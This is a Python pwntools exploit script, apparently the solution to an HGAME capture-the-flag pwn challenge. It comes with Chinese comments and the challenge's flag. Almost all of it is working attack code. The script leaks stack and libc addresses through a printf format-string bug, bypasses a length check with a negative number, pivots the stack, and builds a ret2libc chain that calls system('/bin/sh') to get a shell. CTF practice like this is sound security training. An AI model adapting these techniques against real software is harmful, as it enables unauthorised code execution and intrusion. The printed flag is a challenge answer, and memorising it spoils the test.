1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
context.terminal=["tmux","splitw","-h"]

libc=ELF('./libc.so.6')
elf=ELF('./vuln')
io=process('./vuln')
#io=remote("node1.hgame.vidar.club",31933)
gdb.attach(io)

se      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
rc      = lambda num          		:io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda delims             :io.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00'))	
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
ia		= lambda                    :io.interactive()


sl(b"1")
sl(b"%p") #变量空间正好，可以直接泄露栈地址
ru(b"type: ")
stack = int(rc(14), 16)
print(hex(stack))
sl(b"-1145141919") #绕过长度限制

vuln = 0x4011D9
printf = 0x4012CF
rbp = stack + int("0x2110",16) #迁移rbp
print(hex(rbp))

payload = b"a"*5+p64(rbp+0x60)+p64(vuln) #栈迁移
sl(payload)

payload =b"a"*4+p64(rbp+0x90)+p64(printf)+p64(0)+p64(0)+b"%17$p\x84\x84\x84"+p64(0)+p64(rbp)+p64(0x4011D0)
#前4个是因为最后的ret会将rsp向下走8位
#%17$p是格式化字符串泄露的format，将其调大使得溢出空间充足
sl(payload)

ru(b"type something:")


libc_base = int(rc(14),16) - int("0x29e40",16)
print(hex(libc_base))
pop_rdi_addr = libc_base+libc.search(asm("pop rdi; ret")).__next__()
system_addr=libc_base+libc.symbols["system"]
binsh_addr=libc_base+next(libc.search(b"/bin/sh"))
ret=0x4011EF
#ret2libc

payload =p64(0)+b"a"*4+p64(ret)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
sl(payload)

io.interactive()

#VIDAR{Care1ess_pr1ntf}